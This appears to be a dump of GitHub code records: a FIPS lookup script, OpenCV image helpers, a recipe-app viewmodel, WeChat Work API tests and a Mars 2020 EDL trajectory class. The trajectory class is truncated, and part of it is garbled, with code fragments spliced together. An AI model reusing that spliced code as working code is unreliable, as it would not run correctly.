:urlValue\",\n ExpressionAttributeValues=\n {':statusValue': 'UPDATED', ':urlValue': url},\n ExpressionAttributeNames=\n {'#statusAtt': 'status', '#urlAtt': 'url'},\n )\n\n response = {\n \"statusCode\": 200,\n \"body\": json.dumps(response)\n }\n return response\n", "repo_name": "gadavivi/polly-serverless", "sub_path": "src/convert_to_video.py", "file_name": "convert_to_video.py", "file_ext": "py", "file_size_in_byte": 2882, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "boto3.resource", "line_number": 12, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 13, "usage_type": "attribute"}, {"api_name": "boto3.dynamodb.conditions.Key", "line_number": 15, "usage_type": "call"}, {"api_name": "boto3.client", "line_number": 40, "usage_type": "call"}, {"api_name": "contextlib.closing", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "boto3.client", "line_number": 57, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 62, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 65, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 70, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 87, "usage_type": "call"}]} +{"seq_id": "38974728331", "text": "\"\"\"\nPython script for looking up school FIPS codes\nAuthor: Chris Baudouin, Jr \n\"\"\"\nimport os\nimport requests\n\nSCHOOLS_INPUT_FILE = \"\"\nSCHOOLS_OUTPUT_FILE = \"\"\n\nGC_API_KEY = os.environ.get('GC_API_KEY')\nchecked_schools = {} # Used to remove any possible duplicate schools\nstate_city_fips_cache = {} # Used to reduce number of GC API requests\n\n\nclass APIKeyError(Exception):\n \"\"\"\n Custom Exception to handle non-existent Google Cloud API key\n \"\"\"\n pass\n\n\ndef build_school_csv():\n \"\"\"\n Reads in schools.csv, calculates 
coordinates and identifies FIPS code\n :return: None\n \"\"\"\n schools_file = open(SCHOOLS_INPUT_FILE, \"r\")\n school_line = schools_file.readline()\n\n if GC_API_KEY is None:\n raise APIKeyError('GC API key not found')\n\n while school_line != \"\":\n school_data = school_line.split(',')\n school = school_data[0].rstrip()\n address = school_data[1].replace(' ', '+').rstrip()\n city = school_data[2].replace(' ', '+').rstrip()\n state = school_data[3].replace(' ', '+').rstrip()\n\n if school == \"name\" \\\n or school == \"None\" \\\n or school == '' \\\n or address == '' \\\n or city == '' \\\n or state == '' \\\n or school in checked_schools:\n school_line = schools_file.readline()\n continue\n\n if state in state_city_fips_cache:\n if city in state_city_fips_cache[state]:\n write_to_file(school, address, city, state, state_city_fips_cache[state][city])\n print(\"Loading from cache: \" + school)\n continue\n\n print(\"Fetching data for: \" + school)\n address_lookup_endpoint = f'https://maps.googleapis.com/maps/api/geocode/json?' \\\n f'address={address},+{city},+{state}&' \\\n f'key={GC_API_KEY}'\n\n response = requests.get(address_lookup_endpoint).json()\n\n if len(response['results']) == 0 or response['status'] != \"OK\":\n abort(school, address, city, state)\n continue\n\n try:\n location = response['results'][0]['geometry']['location']\n lat = location['lat']\n lng = location['lng']\n\n fips_endpoint = f'https://geo.fcc.gov/api/census/area?lat={lat}&lon={lng}&format=json'\n fips_response = requests.get(fips_endpoint).json()\n\n if len(fips_response['results']) == 0 or len(fips_response['results'][0][\"county_fips\"]) == 0:\n abort(school, address, city, state)\n continue\n\n fips_code = fips_response['results'][0][\"county_fips\"]\n write_to_file(school, address, city, state, fips_code)\n\n except KeyError:\n abort(school, address, city, state)\n continue\n\n school_line = schools_file.readline()\n\n\ndef abort(school, address, city, state):\n \"\"\"\n Called if no FIPS code could be found or if any other error occurred, saves school with FIPS as None\n :param school: School that was attempted\n :param address: Address of school\n :param city: City of school\n :param state: State of school\n :return: None\n \"\"\"\n print(f'Could not find data for {school}')\n write_to_file(school, address, city, state)\n\n\ndef write_to_file(school, address, city, state, fips=None):\n \"\"\"\n Writes school with possible FIPS code to the SCHOOL_OUTPUT_FILE\n :param school: School that was queried\n :param address: Address of school\n :param city: City of school\n :param state: State of school\n :param fips: FIPS code for school, None if not found or error\n :return: None\n \"\"\"\n output_file = open(SCHOOLS_OUTPUT_FILE, \"a\")\n address = address.replace('+', ' ')\n\n if fips is not None:\n output_file.write(school + ',' + address + ',' + city + ',' + state + ',' + fips + '\\n')\n else:\n output_file.write(school + ',' + address + ',' + city + ',' + state + ',' + \"NONE\" + '\\n')\n if state in state_city_fips_cache:\n state_city_fips_cache[state][city] = fips\n else:\n state_city_fips_cache[state] = {}\n state_city_fips_cache[state][city] = fips\n checked_schools[school] = None\n output_file.close()\n\n\nif __name__ == \"__main__\":\n build_school_csv()\n", "repo_name": "cbaudouinjr/school_fips_lookup", "sub_path": "fips.py", "file_name": "fips.py", "file_ext": "py", "file_size_in_byte": 4354, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": 
"61", "api": [{"api_name": "os.environ.get", "line_number": 11, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 11, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 62, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 74, "usage_type": "call"}]} +{"seq_id": "5887343659", "text": "import os\n\nimport cv2\nimport numpy\n\nfrom library.util import check_type\n\n\"\"\"\nThis tool implement from OpenCV. Can you find more options at https://github.com/opencv/opencv\nDrawing: https://docs.opencv.org/2.4/modules/core/doc/drawing_functions.html\n\n* All method still cover (WIDTH, HEIGHT) and pixel format in RGB format.\n\"\"\"\n\nIM_RGB = 0\nIM_BGR = 0\nDEFAULT_QUALITY = 95\n\n\ndef imread(img_path, pixel_format=IM_RGB):\n check_type(\"img_path\", img_path, str)\n\n if not os.path.isfile(img_path):\n raise FileNotFoundError(img_path)\n\n image = cv2.imread(img_path)\n if pixel_format == IM_RGB:\n return cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n return image\n\n\ndef imwrite(img, img_path: str, quality=DEFAULT_QUALITY, pixel_format=IM_RGB, over_write=False):\n check_type(\"img_path\", img_path, str)\n\n if img_path.rfind(\".jpg\") < 0:\n img_path = img_path + \".jpg\"\n\n if len(img_path) <= 4:\n raise ValueError(\"File's name is empty!\")\n\n if os.path.isfile(img_path) and not over_write:\n raise FileExistsError(img_path)\n\n if pixel_format == IM_RGB:\n img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)\n return cv2.imwrite(img_path, img, [cv2.IMWRITE_JPEG_QUALITY, int(quality)])\n\n\ndef imdecode(buf, flag=cv2.IMREAD_COLOR, pix_fmt=IM_RGB):\n \"\"\"\n Decode image\n Adapt convert image pixel color with pix_fmt\n\n Parameters\n ----------\n buf: source\n flag: cv2.flag\n pix_fmt: format of pixel color. Default: RGB\n\n Returns\n -------\n Image in numpy array\n \"\"\"\n check_type(\"buf\", buf, bytes)\n\n buf = numpy.frombuffer(buf, dtype='uint8')\n image = cv2.imdecode(buf, flag)\n if pix_fmt == IM_RGB:\n return cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n return image\n\n\ndef imencode(image, pix_fmt=IM_RGB, quality=DEFAULT_QUALITY):\n \"\"\"\n Encode image into jpeg codec\n Adapt convert image pixel color with pix_fmt\n\n Parameters\n ----------\n image: source\n pix_fmt: format of pixel color. 
Default: RGB\n quality: JPEG image quality.\n\n Returns\n -------\n Buffer of image encoded\n \"\"\"\n check_type(\"image\", image, numpy.ndarray)\n\n if pix_fmt == IM_RGB:\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n _, buf = cv2.imencode('.jpeg', image, params=[cv2.IMWRITE_JPEG_QUALITY, int(quality)])\n return buf\n\n\ndef resize(image, width=None, height=None, interpolation=None):\n \"\"\"\n Resize an image, with aspect-ratio preservation supported.\n Automatically downscales or upscales to fit the image's height.\n *: width == -1 or height == -1 means auto scale\n\n Parameters\n ----------\n image: source\n width: resize width\n height: resize height\n interpolation: cv2 interpolation\n\n Returns\n -------\n New image in numpy array\n \"\"\"\n assert isinstance(image, numpy.ndarray)\n\n # check whether any width or height parameter was filled.\n if (width is None and height is None) \\\n or not ((not width or width > 0) or (not height or height > 0)) \\\n or (width == image.shape[1] and height == image.shape[0]):\n return image\n\n old_h, old_w, _ = image.shape\n if not width or width <= 0:\n width = height / old_h * old_w\n\n if not height or height <= 0:\n height = width / old_w * old_h\n\n if interpolation is not None:\n return cv2.resize(image, (int(width), int(height)), interpolation=interpolation)\n return cv2.resize(image, (int(width), int(height)))\n\n\n__all__ = ['imencode', 'imdecode', 'imread', 'imwrite', 'resize']\n", "repo_name": "vietmoney/face-anti-spoofing", "sub_path": "library/util/image.py", "file_name": "image.py", "file_ext": "py", "file_size_in_byte": 3529, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": "61", "api": [{"api_name": "library.util.check_type", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 28, "usage_type": "attribute"}, {"api_name": "library.util.check_type", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 45, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 45, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 46, "usage_type": "call"}, {"api_name": "cv2.IMWRITE_JPEG_QUALITY", "line_number": 46, "usage_type": "attribute"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 49, "usage_type": "attribute"}, {"api_name": "library.util.check_type", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 66, "usage_type": "call"}, {"api_name": "cv2.imdecode", "line_number": 67, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 69, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 69, "usage_type": "attribute"}, {"api_name": "library.util.check_type", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 88, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 91, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 91, "usage_type": "attribute"}, {"api_name": "cv2.imencode", "line_number": 93, "usage_type": "call"}, {"api_name": 
"cv2.IMWRITE_JPEG_QUALITY", "line_number": 93, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 114, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 130, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 131, "usage_type": "call"}]} +{"seq_id": "34272282907", "text": "from typing import List\nfrom typing import Optional\n\nfrom pyrecipe.app.viewmodels.shared import ViewModelBase\n\n\nclass AddViewModel(ViewModelBase):\n \"\"\"Viewmodel used for the /recipe/add view.\"\"\"\n\n def __init__(self):\n super().__init__()\n self.method = self.request.method\n self.path = self.request.path\n self._files = None\n self.images = []\n\n @property\n def ingredients(self) -> List[\"ingredient\"]:\n \"\"\"Returns all ingredients passed in from user input.\"\"\"\n ingredients = [\n i.strip() for i in self.request.form[\"ingredients\"].split(\"\\n\") if i.strip()\n ]\n return ingredients\n\n @property\n def tags(self) -> List[\"tags\"]:\n \"\"\"Returns all tags passed in from user input.\"\"\"\n tags = [\n t.strip().lower()\n for t in self.request.form[\"tags\"].split(\"\\n\")\n if t.strip()\n ]\n if not tags:\n return []\n return list(set(tags))\n\n @property\n def directions(self) -> List[\"directions\"]:\n \"\"\"Returns all directions passed in from user input.\"\"\"\n directions = [\n d.strip() for d in self.request.form[\"directions\"].split(\"\\n\") if d.strip()\n ]\n return directions\n\n @property\n def notes(self) -> List[\"notes\"]:\n \"\"\"Returns all notes passed in from user input.\"\"\"\n notes = [n.strip() for n in self.request.form[\"notes\"].split(\"\\n\") if n.strip()]\n return notes\n\n @property\n def prep_time(self) -> int:\n prep_time = self.request_dict.prep_time\n if prep_time == \"\":\n return 0\n else:\n return int(prep_time)\n\n @property\n def cook_time(self) -> int:\n cook_time = self.request_dict.cook_time\n if cook_time == \"\":\n return 0\n else:\n return int(cook_time)\n\n @property\n def servings(self) -> str:\n servings = self.request_dict.servings\n if servings == \"\":\n return \"0\"\n else:\n return servings\n\n @property\n def name(self) -> str:\n return self.request_dict.name\n\n @property\n def files(self) -> Optional[str]:\n files = self.request.files.getlist(\"files[]\")\n if files:\n self._files = files\n return self._files\n\n @property\n def recipe_url(self) -> Optional[str]:\n return self.request_dict.recipe_url\n\n", "repo_name": "trp07/PyRecipe", "sub_path": "pyrecipe/app/viewmodels/recipe/add_viewmodel.py", "file_name": "add_viewmodel.py", "file_ext": "py", "file_size_in_byte": 2416, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pyrecipe.app.viewmodels.shared.ViewModelBase", "line_number": 7, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 18, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 38, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 46, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 80, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 87, "usage_type": "name"}]} +{"seq_id": "14947043018", "text": "# _*_ coding:utf-8 _*_\n# 作者:Season\n# 时间:2020/8/20 22:26\n# 文件名:test_user.py\n# 开发工具:PyCharm\nimport json\nimport logging\nimport time\n\nimport pystache\nimport requests\nfrom weixin.contact.token import WeiXin\nfrom weixin.contact.user import 
User\nfrom weixin.contact.utils import Utils\n\n\nclass TestUser:\n depart_id = 1\n\n # Create a member\n def test_create_user(self, token):\n # data's type determines the parameter: use json when passing a dict, use data when passing a str\n data = {\n \"userid\": Utils.uid(),\n \"name\": Utils.uid(),\n \"mobile\": Utils.uid(),\n \"department\": self.depart_id,\n }\n print(type(data))\n r = User().create(token, dict=data)\n logging.debug(r)\n assert r[\"errcode\"] == 0\n\n # Read a member\n def test_get_user(self, token):\n r = User.get(token, 1)\n logging.debug(json.dumps(r, indent=2))\n assert r[\"errcode\"] == 0\n\n # Update a member\n def test_update_user(self, token):\n data = {\n \"userid\": 1,\n \"name\": Utils.uid(),\n \"mobile\": Utils.uid()\n }\n r = User.update(token, data)\n logging.debug(json.dumps(r, indent=2))\n logging.debug(type(r))\n assert r[\"errcode\"] == 0\n\n # Delete a member\n def test_delete_user(self, token):\n userid = 1\n r = User.delete(token, userid)\n logging.debug(json.dumps(r, indent=2))\n assert r[\"errcode\"] == 0\n\n # Batch-delete members\n def test_batchdelete(self, token):\n userlist = {\n \"useridlist\": [\n \"15981728465\",\n \"zhangsan\",\n \"15981837285\"\n ]\n }\n r = User.batchdelete(token, userlist)\n logging.debug(r)\n # Use eval, not dict, to convert a string to a dictionary\n assert r[\"errcode\"] == 0\n\n # Get department members\n def test_userlist(self, token):\n r = User().simplelist(token)\n logging.debug(r)\n assert r[\"errcode\"] == 0\n\n # Create a member from a template\n def test_creat_by_real(self, token):\n # parse() returns a str, so data is also a str, not json.\n # So use json when passing a dict, and data when passing a str\n data = Utils().parse(template_path=\"user_create.json\",\n dict=\n {\"name\": \"Season\",\n \"userid\": Utils.uid(),\n \"title\": \"校长\",\n \"email\": Utils.uid() + \"@qq.com\",\n \"mobile\": Utils.uid()\n }\n )\n # Add the encoding format\n data = data.encode(\"UTF-8\")\n r = User().create(token, data=data)\n logging.debug(r)\n assert r[\"errcode\"] == 0\n\n # Template usage practice\n def test_create_by_template_practice(self):\n # print(pystache.render(\"Hello {{name}} {{#has}} word {{value}} {{/has}}\",\n # {\"name\": \"season\", \"has\": [1, 2, 3], \"value\": \"pilot\"})\n # )\n print(pystache.render(\"Hello {{name}} {{#has}} word {{value}} {{/has}}\",\n {\"name\": \"season\",\n \"has\": [\n {\"value\": \"pilot\"},\n {\"value\": \"p\"},\n {\"value\": \"i\"},\n {\"value\": \"l\"},\n {\"value\": \"o\"},\n ]\n }\n )\n )\n\n # Get department member details\n def test_userlist_details(self, token):\n department_id = 1\n fetch_child = 0\n r = User.list(token, department_id=department_id, fetch_child=fetch_child)\n logging.debug(r)\n assert r[\"errcode\"] == 0\n\n # Invite members\n def test_invite(self, token):\n data = {\n \"user\": [\"15981841772\", \"15981841772\", \"1598102560.458127\"],\n \"party\": [2],\n }\n\n r = User.invite(token, data)\n logging.debug(r)\n assert r[\"errcode\"] == 0\n\n # Get the QR code for joining the company\n def test_get_join_qrcode(self, token):\n r = User.qrcode(token)\n logging.debug(r)\n assert r[\"errcode\"] == 0\n\n # Get the number of active company members\n def test_active(self, token):\n data = {\n \"date\": time.strftime(\"%Y-%m-%d\", time.localtime())\n }\n r = User.active(token, data)\n logging.debug(r)\n assert r[\"errcode\"] == 0\n", "repo_name": "SeasonPilot/ApiTest", "sub_path": "weixin/contact/test_user.py", "file_name": "test_user.py", "file_ext": "py", "file_size_in_byte": 4663, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "weixin.contact.utils.Utils.uid", "line_number": 24, "usage_type": "call"}, {"api_name": "weixin.contact.utils.Utils", "line_number": 24, "usage_type": "name"}, {"api_name": 
"weixin.contact.utils.Utils.uid", "line_number": 25, "usage_type": "call"}, {"api_name": "weixin.contact.utils.Utils", "line_number": 25, "usage_type": "name"}, {"api_name": "weixin.contact.utils.Utils.uid", "line_number": 26, "usage_type": "call"}, {"api_name": "weixin.contact.utils.Utils", "line_number": 26, "usage_type": "name"}, {"api_name": "weixin.contact.user.User", "line_number": 30, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 31, "usage_type": "call"}, {"api_name": "weixin.contact.user.User.get", "line_number": 36, "usage_type": "call"}, {"api_name": "weixin.contact.user.User", "line_number": 36, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 37, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 37, "usage_type": "call"}, {"api_name": "weixin.contact.utils.Utils.uid", "line_number": 44, "usage_type": "call"}, {"api_name": "weixin.contact.utils.Utils", "line_number": 44, "usage_type": "name"}, {"api_name": "weixin.contact.utils.Utils.uid", "line_number": 45, "usage_type": "call"}, {"api_name": "weixin.contact.utils.Utils", "line_number": 45, "usage_type": "name"}, {"api_name": "weixin.contact.user.User.update", "line_number": 47, "usage_type": "call"}, {"api_name": "weixin.contact.user.User", "line_number": 47, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 48, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 48, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 49, "usage_type": "call"}, {"api_name": "weixin.contact.user.User.delete", "line_number": 55, "usage_type": "call"}, {"api_name": "weixin.contact.user.User", "line_number": 55, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 56, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 56, "usage_type": "call"}, {"api_name": "weixin.contact.user.User.batchdelete", "line_number": 68, "usage_type": "call"}, {"api_name": "weixin.contact.user.User", "line_number": 68, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 69, "usage_type": "call"}, {"api_name": "weixin.contact.user.User", "line_number": 75, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 76, "usage_type": "call"}, {"api_name": "weixin.contact.utils.Utils", "line_number": 83, "usage_type": "call"}, {"api_name": "weixin.contact.utils.Utils.uid", "line_number": 86, "usage_type": "call"}, {"api_name": "weixin.contact.utils.Utils", "line_number": 86, "usage_type": "name"}, {"api_name": "weixin.contact.utils.Utils.uid", "line_number": 88, "usage_type": "call"}, {"api_name": "weixin.contact.utils.Utils", "line_number": 88, "usage_type": "name"}, {"api_name": "weixin.contact.utils.Utils.uid", "line_number": 89, "usage_type": "call"}, {"api_name": "weixin.contact.utils.Utils", "line_number": 89, "usage_type": "name"}, {"api_name": "weixin.contact.user.User", "line_number": 94, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 95, "usage_type": "call"}, {"api_name": "pystache.render", "line_number": 103, "usage_type": "call"}, {"api_name": "weixin.contact.user.User.list", "line_number": 120, "usage_type": "call"}, {"api_name": "weixin.contact.user.User", "line_number": 120, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 121, "usage_type": "call"}, {"api_name": "weixin.contact.user.User.invite", "line_number": 131, "usage_type": "call"}, {"api_name": "weixin.contact.user.User", "line_number": 131, "usage_type": "name"}, {"api_name": "logging.debug", 
"line_number": 132, "usage_type": "call"}, {"api_name": "weixin.contact.user.User.qrcode", "line_number": 137, "usage_type": "call"}, {"api_name": "weixin.contact.user.User", "line_number": 137, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 138, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 144, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 144, "usage_type": "call"}, {"api_name": "weixin.contact.user.User.active", "line_number": 146, "usage_type": "call"}, {"api_name": "weixin.contact.user.User", "line_number": 146, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 147, "usage_type": "call"}]} +{"seq_id": "34680910042", "text": "from edl import CKTrajectory, eventTuple, bodyTuple, SPKLoader, UniformSPKLoader, DAFSPKLoader, et2pdt\nimport numpy as np\nfrom numpy.linalg import inv\nimport matplotlib.pyplot as plt\nfrom kwanmath.vector import vlength, vnormalize, vncross, vcross, rv\nfrom kwanmath.matrix import Mr, Mtrans\nfrom kwanmath.interp import linterp, smooth, tableterp\nfrom kwanmath.geodesy import llr2xyz, aTwoBody, aJ2\nfrom kwanspice.which_kernel import which_kernel, ls_spice\nimport matplotlib.pyplot as plt\nimport spiceypy\nfrom hud import HUD\nfrom picturebox import PictureBox\n\n\nclass M20ReconTrajectory(CKTrajectory):\n def __init__(self):\n self.name=\"m20_recon\"\n # Spacecraft EDL surface trajectory\n edl_spk=\"/mnt/big/home/chrisj/workspace/Data/spice/M20/spk/m2020_edl_v01.bsp\"\n # Spacecraft clock kernel, not used until we have a CK, then must use the one that matches the CK\n edl_sclk=\"/mnt/big/home/chrisj/workspace/Data/spice/M20/sclk/M2020_168_SCLKSCET.00007.tsc\",\n extra_kernels=(\n edl_sclk,\n # Spacecraft frame kernel, must use the one referenced in the CK comments\n \"/mnt/big/home/chrisj/workspace/Data/spice/M20/fk/m2020_v04.tf\",\n #Spacecraft structures kernel. This is mostly about where the various mechanisms\n #are. You would think that this would have something to do with skycrane,\n #and the separation between the descent stage and the rover, but that\n #is actually in the edl bsp below.\n \"/mnt/big/home/chrisj/workspace/Data/spice/M20/spk/m2020_struct_v01.bsp\",\n\n #Spacecraft cruise trajectory\n \"/mnt/big/home/chrisj/workspace/Data/spice/M20/spk/m2020_cruise_od138_v1.bsp\",\n\n # Spacecraft EDL surface trajectory\n edl_spk,\n\n #Spacecraft landing site\n \"/mnt/big/home/chrisj/workspace/Data/spice/M20/spk/m2020_ls_ops210303_iau2000_v1.bsp\",\n\n #Cruise pointing (maybe don't need, but we have it, so we can will use it).\n #Follow the recommended order in the comments\n \"/mnt/big/home/chrisj/workspace/Data/spice/M20/ck/m2020_cruise_recon_nospin_v1.bc\",\n \"/mnt/big/home/chrisj/workspace/Data/spice/M20/ck/m2020_cruise_recon_rawrt_v1.bc\",\n \"/mnt/big/home/chrisj/workspace/Data/spice/M20/ck/m2020_cruise_recon_raweng_v1.bc\",\n #EDL pointing\n \"/mnt/big/home/chrisj/workspace/Data/spice/M20/ck/m2020_edl_v01.bc\",\n )\n loader=DAFSPKLoader(spk=edl_spk, spice_sc=-168031)\n super().__init__(loader=loader,extra_kernels=extra_kernels,ckobj=\"M2020_ROVER\", dropobjs=None)\n # Trajectory values. 
Manually figured from plots of acceleration and body rates\n #self.et_ei=666952679.25992 #Actual time of last Spice point before EI (about 4m above, next point is about 3m below)\n self.events={}\n self.events[\"ei\"] =666952679.262727 #Interpolated EI time\n self.events[\"peakheat\"] =666952758.91 #peak heating\n self.events[\"rollrev10\"] =666952761.09 #Start of first roll reversal\n self.events[\"maxg\"] =666952766.306 #Smoothed maximum g, 104.874 m/s**2 (10.694 earth g)\n self.events[\"maxq\"] =666952766.82 #maximum dynamic pressure\n self.events[\"rollrev11\"] =666952772.37 #End of first roll reversal\n self.events[\"rollrev20\"] =666952781.43 #Start of second roll reversal\n self.events[\"rollrev21\"] =666952791.31 #End of second roll reversal\n self.events[\"rollrev30\"] =666952809.43 #Start of third roll reversal\n self.events[\"rollrev31\"] =666952828.10 #End of third roll reversal\n self.events[\"sufr0\"] =666952903.05 #Start of straighten up and fly right (SUFR)\n self.events[\"ebm0\"] =666952908.20 #First EBM jettison\n dt_ebm0=2.0 #(nominal) Time between EBM jettisons. EBMs were jettisoned in pairs\n\n et_ebm=[self.events[\"ebm0\"]+dt_ebm0*0,self.events[\"ebm0\"]+dt_ebm0*0,\n self.events[\"ebm0\"]+dt_ebm0*1,self.events[\"ebm0\"]+dt_ebm0*1,\n self.events[\"ebm0\"]+dt_ebm0*2,self.events[\"ebm0\"]+dt_ebm0*2]\n for i,et in enumerate(et_ebm):\n self.events[f\"ebm{i}\"]=et\n self.events[\"sufr1\"] =666952917.09 #End of SUFR\n self.events[\"mortar\"] =666952919.895 #Mortar firing\n self.events[\"linestretch\"]=666952920.936 #Line stretch jolt\n self.events[\"chuteinf1\"] =666952921.55 #First chute inflation peak, 49.02 m/s**2 (4.999 earth g)\n self.events[\"chuteinf2\"] =666952922.13 #Second chute inflation peak, 53.67 m/s**2\n self.events[\"heatshield\"] =666952942.527 #Heat shield jettison\n self.events[\"backshell\"] =666953036.562 #Backshell separation\n self.events[\"pdi\"] =666953037.598 #Powered descent initiation\n self.events[\"cvel0\"] =666953068.837 #Constant velocity phase begin, hdot=-32m/s\n self.events[\"cvel1\"] =666953073.077 #Constant velocity phase end\n self.events[\"skycrane\"] =666953078.99 #Skycrane start, hdot=-0.75m/s\n self.events[\"rappel0\"] =666953081.6396100 #Rover rappel begin\n self.events[\"rappel1\"] =666953087.1396100 #Rover rappel end\n #This seems to be the point where the rover actually makes contact with the ground\n self.events[\"contact\"] =666953097.33\n #This seems to be the point where the rover *declares* touchdown.\n self.events[\"land\"] =666953098.82832849025726 # Time of first point in post-landing segment.\n self.events[\"bridle\"] =666953098.828360 #Last point in DIMU segment, assumed bridle cut\n self.events[\"rocker\"] =self.events[\"rappel0\"]+0.7\n #self.events[\"rappel1\"] =self.events[\"rappel0\"]+5.5\n self.events[\"bogie\"] =self.events[\"rappel0\"]+6.0\n #Beginning and end of animation\n self.events[\"anim_et0\"] = self.events[\"land\"] - 420 # Seven minutes of excitement! 
Entry interface is about 0.43s after this time.\n self.events[\"anim_et1\"] = self.events[\"land\"] + 20 # Make sure we are steady on the ground\n\n #sort the event list\n self.events=dict(sorted(self.events.items(),key=lambda x:x[1]))\n\n\n #loader=UniformSPKLoader(et0=et0,et1=et1,dt=1/24,spice_sc=\"-168\")\n loader_ets=loader.time()\n self.i_step={}\n for k,v in self.events.items():\n try:\n self.i_step[k]=np.min(np.where(v=self.events[\"contact\"])[0]\n #Offset the rover rotating position by the delta\n self.rovsvr[:3,w_before]+=dr1vr\n self.rovsvr[:3,w_after]=r1vr_station\n #Offset the descent stage frozen-frame position by the delta rotated into the frozen frame\n self.svf[:3,:]+=Mtrans(Mr(self.Msrf).transpose((0,2,1)),dr1vr)\n def _flyaway(self,sps=200):\n dt=1/sps\n et0=self.events[\"bridle\"]\n #Figure out what direction to fly the descent stage\n t_Msrf=tableterp(self.ets,self.Msrf)\n t_svr=tableterp(self.ets,Mtrans(self.Msrf,self.svf))\n Mds1sib=spiceypy.sxform(self.ckobj,\"J2000\",et0) #J2000 from body at moment of bridle disconnect\n Mds1sfb=self.Msfi @ Mds1sib #Frozen frame from body\n #Mds1srb=t_Msrf(et0) @ self.Msfi @ Mds1sib #Rotating frame from body\n zhat=np.array([[0], [0], [1]])\n ds1rhatr = vnormalize(self.Msrf[-1,:,:] @ self.svf[:,-1])\n ds1ehatr = vncross( zhat ,ds1rhatr)\n ds1nhatr = vncross(ds1rhatr,ds1ehatr)\n #Mds1rtr=np.hstack((ds1ehatr,ds1nhatr,ds1rhatr)).T\n #Mds1rtb=Mds1rtr @ Mr(Mds1srb) #topocentric from body at descent stage location at bridle cut\n #Fly the descent stage off to its final resting place (rest in pieces)\n r0v=self.svf[:3,None,-1]\n v0v=self.svf[3:,None,-1]\n r0=vlength(r0v)\n dsrvfs=[r0v]\n dsvvfs=[v0v]\n ets=[et0]\n m=self.mass[\"DescentStage\"][\"Dry\"]+self.mass[\"DescentStage\"][\"PostLandProp\"]\n i=1\n done=False\n while not done:\n et=et0+i/sps\n #Pitch down from vertical\n pitchdown=np.deg2rad(linterp(0.7,0,1.7,45,et-self.events[\"bridle\"],bound=True))\n if et-self.events[\"bridle\"]<0.7:\n #hover\n F=4*2000\n elif et-self.events[\"bridle\"]<6.7:\n F=4*3000\n else:\n F=0\n #Force direction at current time, in body frame at bridle cut time\n fhatb1=np.array([[0],[-np.sin(pitchdown)],[-np.cos(pitchdown)]])\n #Cosine loss -- we are flying on the canted engines\n fhatb1*=np.cos(np.deg2rad(25))\n #Transform to frozen frame\n fhatf=Mr(Mds1sfb) @ fhatb1\n dsrvf=dsrvfs[i-1]\n dsvvf=dsvvfs[i-1]\n windf=vcross(np.array([[0], [0], [self.mars_omega]]), 